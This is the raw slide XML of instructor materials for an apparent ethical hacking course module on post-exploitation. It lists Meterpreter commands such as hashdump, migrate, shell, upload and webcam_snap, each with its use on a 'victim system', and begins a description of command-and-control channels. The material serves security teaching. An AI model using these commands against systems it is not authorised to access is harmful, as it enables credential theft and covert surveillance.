                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>getuid</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to display the user logged in on the compromised system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1924840843"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370838">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>hashdump</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to dump the contents of the SAM database in a Windows system.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3702292164"/>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3361033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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Tabela 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5EA211B-14AC-0385-C983-3D175C0D4AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1609858112"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="232482" y="765508"/>
          <a:ext cx="8767134" cy="4315995"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1431249">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="360457933"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="7335885">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3995444981"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="367392">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Meterpreter Command</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2242075988"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>idletime</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to display the number of seconds that the user at the victim system has been idle.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="761296095"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>ipconfig</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to display the network interface configuration and IP addresses of the victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4144331361"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>migrate</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to migrate to a different process on the victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3568989742"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="312964">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>ps</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to display a list of running processes on the victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="298727215"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>resource</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to execute Meterpreter commands listed inside a text file, which can help accelerate the actions taken on the victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1745967240"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>search</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to locate files on the victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1693981223"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>shell</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to go into a standard shell on the victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3494402624"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370839">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>upload</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to upload a file on the victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="31732502"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370838">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>webcam_list</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to display all webcams on the victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1946701000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370838">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>webcam_snap</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Used to take a snapshot (picture) using a webcam on the victim system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1524166684"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1505967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name="Slide 1">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543050"/>
            <a:ext cx="6400800" cy="1171036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Performing Post-Exploitation Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3343275"/>
            <a:ext cx="3657600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="CEE8C3"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Instructor Materials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="101" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4114800"/>
            <a:ext cx="3657600" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ethical Hacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Command and Control (C2) Utilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="8962274"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a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Attackers often use command and control (often referred to as C2 or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>CnC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>) systems to send commands and instructions to compromised systems. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRP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The C2 can be the attacker’s system (for example, desktop, laptop) or a dedicated virtual or physical server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRP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A C2 creates a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>covert channel</a:t>
            </a:r>
            <a:r>
